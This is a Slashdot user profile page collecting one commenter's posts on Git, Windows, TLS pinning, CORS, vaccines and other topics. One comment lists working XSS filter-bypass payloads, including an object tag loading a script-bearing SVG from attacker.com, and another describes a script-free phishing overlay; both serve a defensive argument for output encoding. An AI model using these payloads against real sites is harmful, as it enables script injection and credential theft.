×

Announcing: Slashdot Deals - Explore geek apps, games, gadgets and more. (what is this?)

Thank you!

We are sorry to see you leave - Beta is different and we value the time you took to try it out. Before you decide to go, please take a look at some value-adds for Beta and learn more about it. Thank you for reading Slashdot, and for making the site better!

Comments

top

Critical Git Security Vulnerability Announced

cbhacking Re:Mac OS X does support case-sensitive filesystem (58 comments)

So does Windows, though you may confuse the Win32 API if you use it. NTFS is case-preserving and the native APIs are case-sensitive. Win32 functions can use FILE_FLAG_POSIX_SEMANTICS to require case-sensitivity, and Interix (Microsoft's POSIX-on-NT environment that runs in the Subsystem for Unix Applications or SUA) does so by default. I don't know of any way to make Win32 case-sensitive by default without doing some kind of crazy hooking of the relevant APIs or installing a filter driver to enforce it.

3 hours ago
top

Critical Git Security Vulnerability Announced

cbhacking Re:I blame Microsoft (58 comments)

Actually, Microsoft themselves has an API for accessing NTFS drives in a case-sensitive manner, and I'm not talking about the native NT API or even the FILE_FLAG_POSIX_SEMANTICS Win32 file API flag. All versions of NT from 3.1 (the first) to 6.2 (Win8; it was removed from 8.1) have support for a POSIX operating environment - basically a full Unix-like OS running atop the NT kernel - and for proper Unix-like-ness it is case sensitive.

Mind you, Win32 programs do tend to get confused by it all. For example, CMD's "dir" command will list both "test.txt" and "TEST.TXT" in the same directory, and even correctly note if they have different sizes or datestamps. However, the "type" command (print file contents) on *either* name (or some other-cased version of the name) will instead print the contents of one of the files - doesn't matter what you type, the OS will pick - and it will print it twice (once for each copy of the file with that name).

I've been using the Interix (name of the Unix-like operating environment that runs in the NT POSIX subsystem, as reported by the uname command) build of git for years now. I should probably stop - the repo my package manager used has died, and I haven't bothered to set up a different package manager yet so my packages are outdated - but I am, humorously enough, not vulnerable to this particular attack even with that outdated version.

3 hours ago
top

Ars Reviews Skype Translator

cbhacking Re:One annoyance... (33 comments)

I was just about to say... this is a preview. I wouldn't expect pre-release versions of the new feature to be rolled out across all platforms. We can hope that it will happen once the feature leaves beta, though.

5 hours ago
top

Reaction To the Sony Hack Is 'Beyond the Realm of Stupid'

cbhacking Re:Actually (493 comments)

And no navy and airforce large enough to protect it as they make their way across the pacific.

I'm imagining an attack sub commander shooting his tubes empty blowing away converted fishing boats loaded down with soldiers and then wondering what the hell to do about the rest of them. On the other hand, we have torp bombers as well, and those can just go back to bas to re-arm. As you say, it's not like North Korea has the air force or navy to protect them against a carrier group.

But yeah, South Korea is in a shitty situation. Strong economy, high-tech society, powerful allies... and within bombardment range of enough heavy artillery to basically reduce their capitol city if NK decides to let all their crazy out.

8 hours ago
top

Verizon "End-to-End" Encrypted Calling Includes Law Enforcement Backdoor

cbhacking Re:This should be free (162 comments)

Well said. More info, for the curious: http://en.wikipedia.org/wiki/C...

A lot of people don't even realize that web browsers have the ability to generate key-pairs of which only the public portion is ever sent to a CA or anybody else. It's actually a fairly sane system. If you need to export the private key (for example, to copy it from your PC to your phone, or to back it up) then you have to do so through the web browser or through whatever keystore it uses (Windows, for example, has a built in one you can access through certmgr.msc, though Mozilla products use their own store instead of the system-wide one).

2 days ago
top

Bellard Creates New Image Format To Replace JPEG

cbhacking Re:JPEG2000 replaced JPEG (377 comments)

Preflight is only required for non-standard verbs or non-standard headers. If you're just requesting data (rather than trying to take some action on the server), preflight is not used.

5 days ago
top

Time To Remove 'Philosophical' Exemption From Vaccine Requirements?

cbhacking Re:Vaccines are totally safe (1039 comments)

Similarly, the highly-infectious diseases that the current generation of American parents grew up with - chicken pox, the flu, etc. - tend to have minor effects. Some people die of them every year, but the number is miniscule and most people show no sign of having ever been sick a week after the infection runs its course. Compare with things like Polio (used to kill people by paralyzing their chest so they couldn't breathe and suffocate where they lay, though more often it simply left you with misshapen and crippled limbs for life), Smallpox (scars covering your body even if you made an otherwise-full recovery), and so on. I'll bet a lot of the anti-vaccination crowd, whether they know it or not, think that even if they get infected it'll basically mean they have to stay home from school/work for a few days, maybe take some medicine. They don't ever think about things like being confined to iron lungs (not that we use those anymore, but hospitals used to have entire wards full of them)...

about a week ago
top

Time To Remove 'Philosophical' Exemption From Vaccine Requirements?

cbhacking Hoping you arent vaccinated against logic... (1039 comments)

Slippery slope fallacy ahoy! Just because one decision is made for a sound and logical reason of communal good does *NOT* mean that other (unjustified) decisions will be made even if they are promoted on the basis of communal good. Each choice needs to be evaluated on its own merits. Just because some idiots or fraudsters will try to claim that something unwise should be "done for the greater good" doesn't mean doing things for the greater good is invalid as a reason to do things, and the reverse is also true.

Incidentally, did you know that the government is already empowered to arrest you for spreading infectious diseases. If you knowingly infect other people, or if there's an outbreak and you attempt to violate it, you can be prosecuted as a criminal.

Mind you, if you want to withdraw from society and go live in your own little 21st-century equivalent of a leper colony with all the other plague vectors, be my guest. You won't get many visitors - nobody can be 10% sure a vaccine will protect them, so we are all potentially dependent on herd immunity - but you are sure as hell not welcome to freeload on our herd immunity without a valid medical reason!

about a week ago
top

Time To Remove 'Philosophical' Exemption From Vaccine Requirements?

cbhacking Re:No (1039 comments)

Your driver's license (or other ID card) seems like one option. If you get found with the "unvaccinated" sticker on your card (sort of like the "organ donor" sticker, but for people who want to endanger others rather than save them) in a public place and aren't masked or whatever, it's a fine. Or maybe you just get thrown out of the establishment. Have fun going to bars (or buying alcohol at a store), or doing much of anything else that requires ID.

This *sounds* awful - a government-mandated mark of belonging to an unpopular minority - but it's a self-selected minority that puts all the rest of us at risk. I see no reason that people intentionally acting as potential plague carriers should be able to hide among the general populace. Maybe if they had to show their true colors they could get through their thick skulls just how horrible what they're doing is...

about a week ago
top

Bellard Creates New Image Format To Replace JPEG

cbhacking Re:JPEG2000 replaced JPEG (377 comments)

Boosting the signal, for those who don't read ACs:

CORS (Cross-Origin Resource Sharing) is explicitly intended to support things like CDNs. It lets you make cross-domain XHRs (and access the responses), so the JavaScript-based decoder will work perfectly. It adds minimal additional bandwidth requirement over a standard cross-domain GET (one short extra header on request, a couple on response), is supported on all mainstream browsers, and is much more secure that stupid hacks like JSON-P (though that would work here too, if for some reason you wanted to live in last decade's terrible work-arounds for same-origin policy).

http://en.wikipedia.org/wiki/C...

about a week ago
top

Bellard Creates New Image Format To Replace JPEG

cbhacking Re:Compare to... (377 comments)

I realize that this is Slashdot and we have a great tradition of not RTFA, but given that this is about an image format you could at least go LATFP (Look At The Fucking Pictures). It's also an impressive display of how well image deciding using JavaScript works (but then, this is the guy who wrote an entire x86 emulator capable of running Linux using JS, and even made it work on IE; I have no doubt as to the man's skill in that realm).

Link for image format and quality comparisons: http://xooyoozoo.github.io/yol...
Link for info about the image format and links to more comparisons: http://bellard.org/bpg/

about a week ago
top

Firefox 34 Arrives With Video Chat, Yahoo Search As Default

cbhacking Re:KCM vulnerable to MITM from day one (237 comments)

Well, you can pre-pin a cert (Google does this with their own properties, for example, and as of Firefox 32, Firefox does it for Mozilla stuff and I think some Google stuff). You can also always manually check a certificate's fingerprint before you send any data over it. That leaves the question of what you check it against, of course, but that's the whole key distribution problem; at some level you have to have a trusted source of key identity.

I really do wish there was more support for TOFU (Trust On First Use) in browsers today, though. For example, I *can* explicitly trust a self-signed certificate for example.com. However, if I later get a different cert for example.com, my browser will simply evaluate it the way it would evaluate any cert (for example, if it's signed by a Chinese government-controlled CA, the browser will trust it unless I've removed trust for that CA). None of the major browsers will stop and say "Hey, that is *NOT* the cert I expect for this site!" the way SSH (or Remote Desktop, for that matter, which also uses TOFU) will. This greatly irks me. Certificates don't change that often, and most of the time it's just an update to the expiration date or adding a new subdomain or something else innocuous like that. Even a change to the public key isn't that big a concern, especially if the old key is revoked; people rotate keys sometimes as a matter of good practice. But a change to the CA, or a change to a pinned leaf node (where I basically said "this shouldn't change"), ought to raise warning flags.

about two weeks ago
top

Firefox 34 Arrives With Video Chat, Yahoo Search As Default

cbhacking Re:512-bit self-signed certs (e.g. DD-WRT) (237 comments)

Um... I hate to rain on your Mozilla parade here, but Chrome has full certificate pinning for Google properties, and has had it for quite a few versions now. Using any unexpected cert, no matter how trusted, for a Google property (or the handful of others that Chrome supports) will be detected and blocked. Mozilla has certificate pinning now as well, but only since version 32 (which is what, a month ago?). If the organization in question wanted to MitM Firefox's traffic as well as Chrome's, they would (until recently) have found it much easier to do on Firefox than on Chrome.

about two weeks ago
top

Firefox 34 Arrives With Video Chat, Yahoo Search As Default

cbhacking Re:Comodo's certificate extortion (237 comments)

Sigh... I can't tell if you're arguing this because you don't understand the English language, of if you're just trolling.

If somebody has to "be presenting their own" certificate, then they are NOT PASSIVE!! A passive network attacker is, for example, somebody sitting at a coffee shop with the WiFi card in promiscuous mode, watching all the traffic that gets sent over that (open) network. In that position, the attacker cannot do a damn thing about a self-signed cert. Now, if they are able to use ARP spoofing or DNS hijacking or can configure the router's upstream host or something like that, then they can intercept traffic and present their own certificate, sure. That requires an *active* attack, though.

The reason that passive attacks are so concerning right now is that it's pretty trivial for ISPs and governments to record all network traffic that they want to. It just costs money for storage and storage bandwidth. However, they aren't actively intercepting that traffic, just passively recording it for later data mining. TLS, even using anonymous Diffie-Hellman or a self-signed certificate, is sufficient to completely defeat that kind of monitoring.

You're basically arguing that since an armored car can't tae a hit from the cannon of a main battle tank, there's no point in armoring them at all and it would be better for them to go unarmored so as not to lure people into a false sense of security. Turns out that's bullshit: the typical threat to people moving valuables is from small arms (which an armored car can shrug off just fine), and the typical threat to browser privacy is from pervasive passive monitoring, which self-signed certs defeat. Not that I would ever argue that it's better to have a self-signed cert than a CA-signed one, but it's not as *much* worse as you seem to think.

Besides, there's things you can do to make a self-signed cert even more secure. For example, you (the user) can add *just that cert* to your trust store. Now, if an attacker tries to substitute their *own* self-signed cert, your browser should object, or at least won't show the site as truly secured. For applications (including a few browsers) that support certificate pinning, this can also be used with self-signed certs in a trust-on-first-use basis (take a look at, for example, HTTP Public Key Pinning).

about two weeks ago
top

Firefox 34 Arrives With Video Chat, Yahoo Search As Default

cbhacking Konqueror (237 comments)

Konqueror is still pretty decent. These days it generally uses WebKit (which was built from Konqueror's KHTML engine originally). I like its interface and generally high utility.

Aside from being in the package repose for pretty much all desktop Linux and BSD variants, it's also available for Windows. Haven't checked for Mac, but it's probably available there too.

about two weeks ago
top

Intel Core M Notebooks Arrive, Lenovo Yoga 3 Pro Tested

cbhacking Re:so close to perfect (78 comments)

Assuming it's like my Yoga 2 Pro, which seems likely, you can toggle the default behavior of those keys from special-function mode to F-key mode (hold Fn to reverse that, of course). It's in the BIOS/UEFI setup, same place it has been on the last ~5 years (maybe longer?) of Lenovo hardware

about three weeks ago
top

Google Chrome Will Block All NPAPI Plugins By Default In January

cbhacking Re:Dropping NPAPI broke VMware consoles on Linux (107 comments)

Stupid and kludgey hack, but is it possible to solve this, at least to a degree, with Wine? Running either the Windows version of Flashplayer (in something like nspluginwrapper; I think I remember hearing about a way to do this though I never tried it) in a Linux browser, or running a full Windows browser (can Wine do that these days?) seems like it solves the problem. It introduces at least one problem, too, of course... but at least you *can* install updates instead of pinning to a version that will only get more outdated...

about three weeks ago
top

Rooftop Solar Could Reach Price Parity In the US By 2016

cbhacking Re:cost/price per kW hour comparison is nonsense (516 comments)

it's a near impossibility to site a solar panel on a sailboat that is entirely shade free for the entire length of the day

That's probably true of a reasonably-sized monohull, but Ocelot is a cat. Setup is 4x 120W Kyocera panels out over the dinghy davits (we have a lot of room back there and it doubles as a shade for the rear of the cockpit). You can read a bit more about them here (photos are outdated in general but we haven't modified the array since they were taken): http://svocelot.com/Ocelot/mod...

Having the panels so far aft and so high provided some protection from salt spray (enough that they don't need cleaning after any but the roughest passages, the kind where the whole boat needs a good rain rinse) and also kept them out of the line of most of our shadows. If the sun sets or rises directly in line with the panels and mast, then yes, we'll lose that panel, but this can often be remedied by running the boom out to one side (tied down with the jibe preventer) and letting the (relatively huge) sail protector swing the boat a few degrees away from pointing dead into the wind. By anywhere close to the hours when the sun is at full power, even our slightly-raked mast just isn't far enough back to shade the panels. (As a side note, it occurs to me that this may explain why the ramp up to full power took longer in the morning than evening; if the easterly winds meant the panels were occasionally shaded in the early morning, we'd only have 3/4 the nominal power production for that much insolation.)

As for angle, that definitely cost us some power - our panels are very much immobile, aside from changing the orientation of the entire boat - but I'm not actually sure how much. Even at 60 degrees off apex, which is pretty late in the day (assuming you're right under the sun's path, within +/- 60 degrees is 1/3 of the day, or 8 hours), you still get 50% of the insolation you would get at apex, atmospheric losses aside. That's certainly significant losses, and it drops off sharply after that, but the middle hours of the day are not severely affected.

By the way, nice site! I'll have to ask my folks if they ever ran into Animation coming up the Aus coast. Alternatively, do you know S/V Vamp? Good friends of ours. I'm sorry you posted as AC but I may ping you by email.

about three weeks ago
top

Critical XSS Flaws Patched In WordPress and Popular Plug-In

cbhacking Re:Regular expressions (41 comments)

<img src="xss" onerror="alert('Nope!')" />
<iframe src="javascript:alert('That won't work.')"></iframe>
<object data="http://attacker.com/SvgCanContainScriptsAndCanUseTheParentObjectToAttackTheHostingPage.svg"></object>
<scri<scriptpt>alert("In fact, that kind of blacklisting is trivial to bypass.");</script>
<form action="javascript:alert('I once spent a month breaking a client's blacklist every time they updated it to block my last POC exploit, telling them all the while they had to use output encoding.');"><input type="submit" value="SPOILER" /></form>
<h1 onmouseover="alert('They eventually did, but oh man did they waste a lot of time trying variants on your suggestion first!')">REALLY BIG TEXT THAT YOUR MOUSE WILL GO OVER</h1>

People thinking like you do frequently leads to exactly this sort of problem, where something *supposedly* has XSS protection but in fact totally doesn't. With the possible exception of the nested script tags (if you're smart enough to run the filter repeatedly until no further hits occur, that'll be caught), every single one of these lines will execute arbitrary attacker-controlled JavaScript through the filter that you propose. I strongly recommend that you go read OWASP, especially the top 10, and in the meantime I hope you haven't written any in-production web applications...

about a month ago
top

Critical XSS Flaws Patched In WordPress and Popular Plug-In

cbhacking Re: Regular expressions (41 comments)

Content Security Policy (as you link) is indeed a "better" solution, in the technical sense; it's fine-grained, supports reporting, doesn't require servers to generate the random "hard_to_guess_string" needed to unlock the block, and (possibly most important) doesn't introduce a new un-XML-like construct into HTML. On the other hand, it tends to be more complicated to use it in real-world web applications, and it's so broad that a lot of browsers have either no support for it or have serious bugs in their support (did you know SVG can contain scripts, and sometimes CSP rules aren't applied properly there?).

Sandboxed iframes are simpler and basically do what you're asking for, except that the content is loaded from an external source or by writing it into the framed document (if same-origin); no need to worry about an attacker terminating the sandbox with a </iframe> tag because the sandboxed content isn't inline with the iframe itself. On the other hand, given how few people actually use them (despite pretty good browser support), the problem may be more a matter of web devs being bad at security than of web devs not having good security tools. Of course, we knew that already...

With all that said, I feel compelled to point out that *just* blocking XSS isn't enough anyhow. Without using a single scripted behavior (just HTML and some simple CSS) I can do things like create a lightbox that contains an HTML form saying "Your login session has expired. To ensure the security of your account, please log in again." with a username/password box, all themed accordingly with the site I'm attacking. Of course, the form POSTs to a web server that I (the attacker) control, but you don't know that. There's many other types of things you can do with the same restrictions. It's not enough to block scripts and plugins, you also have to prevent the attacker from simply taking over the page with their own content by layering it on top of the Z-order.

about a month ago

Submissions

top

Microsoft allowing WP8 users to get updates directly

cbhacking cbhacking writes  |  about a year ago

cbhacking (979169) writes "In June of 2012, Microsoft announced that they would be providing a system whereby "registered [Windows Phone] enthusiasts get early access to updates" without waiting for carrier approval and broad distribution. For more than a year, that has been an unfulfilled promise, and for many users, updates have been delayed or may even still be unavailable. Today, coinciding with the release of WP8 Update 3 (a.k.a. GDR3), Microsoft is allowing "developers" (anybody who has enabled app sideloading on their phone) to opt into a "Windows Phone Preview" program to allow updating immediately.

Like the update itself, this is likely a move in response to consumer demand and comparisons to iOS and Android, as there is little in the update which specifically interests developers. However, the program does warn that participation may invalidate your device's warranty; this may have been required by the carriers to relieve concerns of high support costs in the event of a botched update. While only the Microsoft portion of the updates (as opposed to driver firmware or OEM customizations) are available through this program, participating phones will also continue to receive public updates as they are rolled out."
top

Zune 3.0: Wireless Purchase, Games, 16GB

cbhacking cbhacking writes  |  more than 6 years ago

cbhacking writes "Microsoft released the Zune 3.0 yesterday. The device firmware has been immensely upgraded: it now supports connecting to wireless access points, sampling and purchasing music through a built-in store interface, playing games, and several other new things. You can read Microsoft's blurb on what's new at zune.net.

The Windows software has also been improved, etter integrating the social features.

Additionally, zunes are now available in more colors, the 4GB flash player is being discontinued for a 16GB player, and there's now a HDD-based 120GB model."

Link to Original Source
top

CrossOver Games released for Linux, OS X

cbhacking cbhacking writes  |  more than 6 years ago

cbhacking writes "CodeWeavers, the company that supports the open-source Wine project that allows running Windows applications on UNIX-like operating systems, has released CrossOver Games for Linux and OS X. The launch includes a considerable list of supported titles, including such popular (and graphically intensive) games as EVE Online, Counterstrike: Source (and other Steam games), and World of WarCraft.

A trial version is also available for download."

Link to Original Source
top

Microsoft .NET source to be available for viewing

cbhacking cbhacking writes  |  more than 7 years ago

cbhacking writes "A post on the blog of Microsoft's Scott Guthrie has some exciting news for .NET developers: with the release of Visual Studio 2008 later this year, the .NET Framework 3.5 source code will be released for reference purposes. Most of the libraries, including System.Runtime, System.Security, System.Windows.Forms, and System.Web will be made available with the release of VS2008, with more some additional non-core libraries coming later. The code will be available for either standalone download and viewing, or as debugging symbols with associated source for integrated debugging with VS2008.

There's a catch though: although the license abbreviation used in the post, MS-RL, usually refers to the copyleft and OSI-approved Microsoft Reciprocal License (which allows modification and redistribution), the license actually explicitly mentioned and linked to is the Microsoft Reference License, which prohibits modification or redistribution. Although an open-source release of the code would be great, this is still likely to be very helpful for debugging, examining behavior of the libraries, and selecting the correct methods or algorithms for a given situation."
top

Iraq Whistleblower Imprisoned, Tortured

cbhacking cbhacking writes  |  more than 7 years ago

cbhacking writes "Forbes.com has a telling story on the fraud and corruption that has plagues the Iraqi reconstruction efforts and, more frighteningly, the harsh penalties faced by whistleblowers. Many have been vilified, demoted, or fired outright. Now, the story has come out of Navy veteran Donald Vance, who was working as a civilian in an Iraqi company. After reporting to the FBI that his company was making illegal sales of military weapons to customers ranging from State Department workers to Iraqi insurgents, Vance was held without a trial for 97 days in Camp Cropper, an American military prison outside Baghdad. During his time there, he was subjected to "that head-banging music blaring dawn to dusk and interrogators yelling the same questions over and over."

Vance is now back in the USA and, along with a colleague who helped him gather evidence and was treated similarly in return, has filed a federal lawsuit alleging they were illegally imprisoned and subjected to physical and mental interrogation tactics "reserved for terrorists and so-called enemy combatants.""

Link to Original Source
top

cbhacking cbhacking writes  |  more than 7 years ago

cbhacking writes "Previously, searching for 'Powertoy Vista' has been a quick road to failure. However, Brandon Paddock, a MS developer, has independently produced and is maintaining a very handy tool called Search++ that adds all kinds of capabilities to the built in desktop search.
Some of the standard features are things like typing 'g <search string>' to launch a Google search, or 'play[artist|album] <name>' to find and start playing music. Another, very nice for those of us who start almost all programs in Vista from the Start menu, is the ability to start programs with elevated permissions via 'sudo <Program>'.
The basic features are great and very easy to use, but Start++ is also extensible and user-modifiable. You can even import additional search tools (called 'Startlets'), and export your own Startlets.
You can download Search++ and additional Startlets here."
top

cbhacking cbhacking writes  |  more than 8 years ago

cbhacking writes "ABC News has a well-written review of the latest version of the Microsoft Office suite, which has been shipped to manufacturers. Representing the first major upgrade since 2003, Office 2007 has an incredible and instantly visible collection of new features, including an innovative new interface. For those who downloaded the public beta (all ~5 million of us), Office 2007 has already shown itself to be an amazing software suite.

The review includes overall impressions of the new version, plus ratings of the most common individual apps. It is mostly positive, from the easy learning curve for the new interface and the capabilities it offers, to the number of things Microsoft finally got RIGHT, to the good migration tools.

In addition to the many tools and tips the review mentions, I would add the ability of Word to (via plugins) read/write ODF and to export to PDF and Microsoft's new XPS format."
top

cbhacking cbhacking writes  |  more than 8 years ago

cbhacking writes "The Pentagon is currently considering options for developing "the ability to strike targets around the world within an hour." According to Space.com, there are several main options being considered: an "Advanced Hypersonic Weapon", placing weapon payloads on small space launch vehicles, fitting missile submarines with a new design of ballistic missile with a conventional payload, or placing conventional warheads on the (traditionally nuclear) Trident missiles our subs currently carry.

Aside from the coolness factor of an autonomous hypersonic vehicle which achieves suborbital altitudes but for the most part flies towards its target like an aircraft, the main advantage of the Advanced Hypersonic Weapon seems to be that it wouldn't be confused with a nuclear launch. Several prominent people, including Ted "Series of Tubes" Stevens, have suggested that using Trident missiles would be dangerous as it may cause other countries to believe we are launching nuclear warheads at them. However, it appears to be the option involving the least re-invention of the wheel, and could be operational "before the end of this decade."

The option of weaponizing space launch vehicles seems to already be facing significant opposition. The Advanced Hypersonic Weapon is receiving some funding, but re-arming the Tridents is out at least until completion of a report on — among other things — the military and political issues.

Is it just me, or aren't there any major reasons the other weapons couldn't be equipped with nuclear warheads anyhow? Do we actually need a different weapon for everything?"
top

cbhacking cbhacking writes  |  more than 8 years ago

cbhacking writes "The Windows Vista Team has posted a blog about the "Express Upgrade" program. Basically, if you buy a new computer with XP, Microsoft will make the upgrade to Vista available for a relatively low price.

The edition(s) you can upgrade to through this offer vary by what edition of XP you have. For example, Media Center will upgrade to Vista Home Premium, and Professional or Tablet to Vista Business, for a nominal cost. XP Home can be upgraded to either Vista Home Basic or Premium, for a 50% discount off the normal upgrade pricing. Enterprise and Ultimate are not offered in this list. Note that the upgrade versions of Vista will already cost less than the full retail versions; this program reduces the cost further for people who purchase a PC just before Vista comes out (or shortly thereafter).

It seems that very few people actually upgrade the OS; they simply buy a new computer with the new version. Maybe this program will increase the Vista install base in its first few months?"

Journals

top

Another major music store offers unrestricted MP3s

cbhacking cbhacking writes  |  more than 7 years ago

When I started the RealNetworks Rhapsody software this morning, I discovered a cause for some celebration by anybody who supports DRM-free music purchases: the Rhapsody store is now offering some unrestricted MP3 downloads. At present only about 5000 albums (roughly 50000 songs) are available, but that is just an initial offer - I haven't even found an announcement anywhere - and they claim to be working to increase the number of MP3 tracks available.

The MP3s are encoded at 256kbps, and cost no more than the standard DRM-crippled music (which is also 256kbps) at 89c/song for subscribing members, or 99c/song for non-subscribers (the subscription gives the ability to listen to streamed music on demand, starting at $13/month). Prices are US dollars, and I don't know whether the service is available internationally.

The bad news: downloading the music requires running the Rhapsody player software (version 4, just released) and at present it's only available on Windows. Online streaming is available to other OSes through http://rhapsody.com/ (works in Firefox, via a plugin) but the cross-platform Real Player software cannot access the music store, and last I tried it wouldn't run in wine.

Slashdot Login

Need an Account?

Forgot your password?